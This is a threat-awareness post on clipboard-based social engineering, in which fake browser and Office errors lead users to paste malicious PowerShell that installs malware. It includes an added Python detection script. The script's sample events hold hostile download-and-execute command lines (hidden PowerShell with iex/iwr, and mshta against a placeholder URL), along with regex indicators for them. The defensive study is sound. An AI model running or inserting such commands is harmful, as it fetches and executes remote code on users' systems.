
Threat Awareness – Threat Actors Confound Users into Compromise via the Clipboard

Created: Tuesday, June 18, 2024 - 14:21
Categories:
Cybersecurity

Proofpoint has published research on an increase in a technique that uses distinctive social engineering to direct users to copy and paste malicious PowerShell scripts that infect their own computers with malware. Through fake Google Chrome, Word, and OneDrive errors, users are tricked into literally copying and pasting malicious PowerShell scripts into a Windows terminal.

According to Proofpoint, although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk.

Additional notables:

  • The campaign uses fake Google Chrome, Word, and OneDrive errors to trick users into running malicious PowerShell "fixes" that install malware.
  • These errors prompt the visitor to click a button that copies a PowerShell "fix" to the clipboard, then to paste and run it in the Run dialog or a PowerShell prompt.
  • The payloads observed include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.
  • Threat actors also deliver the lure through JavaScript in HTML attachments and on compromised websites; in the new attacks the overlays display fake Google Chrome, Microsoft Word, and OneDrive errors.
  • The new campaign has been observed in use by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and TA571, a threat actor known for operating as a spam distributor that sends large volumes of email leading to malware and ransomware infections.
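The Run-dialog path described in the bullets above suggests a simple hunting heuristic. The following Python is an added example, not Proofpoint's code or anything from the original post: it scans constructed Sysmon-style process-creation records for a PowerShell, cmd or mshta process whose parent is explorer.exe (the parent of anything started from Win+R) and whose command line shows download-and-execute indicators. The sample events, the field names, the indicator regexes and the explorer.exe heuristic are all assumptions of this example.

```python
import re

# Constructed sample process-creation events shaped like Sysmon Event ID 1 fields
# (ParentImage, Image, CommandLine). Not real telemetry; example.invalid is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Run dialog (parent explorer.exe) launching a hidden download-and-run PowerShell "fix"
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/fix.ps1)"'},
    # Run dialog launching mshta against a remote URL
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/fix.hta"},
    # Benign: user opens an interactive PowerShell window from Explorer (no indicators)
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": f'"{PS}"'},
    # Benign: a service runs a local script; parent is not explorer.exe
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

# Executables a pasted "fix" is typically handed to, and command-line indicators of
# download-and-execute behaviour as (label, case-insensitive regex) pairs.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = [
    ("hidden window", re.compile(r"-w\w*\s+hid", re.I)),
    ("encoded command", re.compile(r"-e\w*\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote download", re.compile(r"downloadstring|\biwr\b|invoke-webrequest|\bcurl\b", re.I)),
    ("mshta remote content", re.compile(r"mshta\S*\s+https?:", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
]

def image_name(path: str) -> str:
    """Lowercase file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(event: dict) -> list[str]:
    """Indicator labels matched by one event; an empty list means not flagged.
    Heuristic (an assumption of this example, not Proofpoint's detection logic): a
    launcher whose parent is explorer.exe, which is how the Win+R Run dialog spawns
    processes, and whose command line shows download-and-execute behaviour.
    """
    if image_name(event["ParentImage"]) != "explorer.exe":
        return []
    if image_name(event["Image"]) not in LAUNCHERS:
        return []
    return [label for label, rx in INDICATORS if rx.search(event["CommandLine"])]

def find_clickfix_candidates(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(event index, matched indicators) for every flagged event, in input order."""
    return [(i, m) for i, ev in enumerate(events) if (m := clickfix_indicators(ev))]
```

A command pasted into an already-open PowerShell prompt will not appear on the prompt's own command line; for that path, apply the same indicator check to child processes of powershell.exe instead.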

Security analysts and sysadmins are encouraged to read the Proofpoint post for further analysis.

Analyst comment (Jennifer Lyn Walker): While this tactic does involve significant user interaction, as Proofpoint assesses, “the social engineering is clever enough…which may prompt a user to take action without considering the risk.” That said, there are some good screenshots in the Proofpoint blog post that could be used to show users what to look for and emphasize the need for vigilance and reporting this and similar “technical sounding” tactics.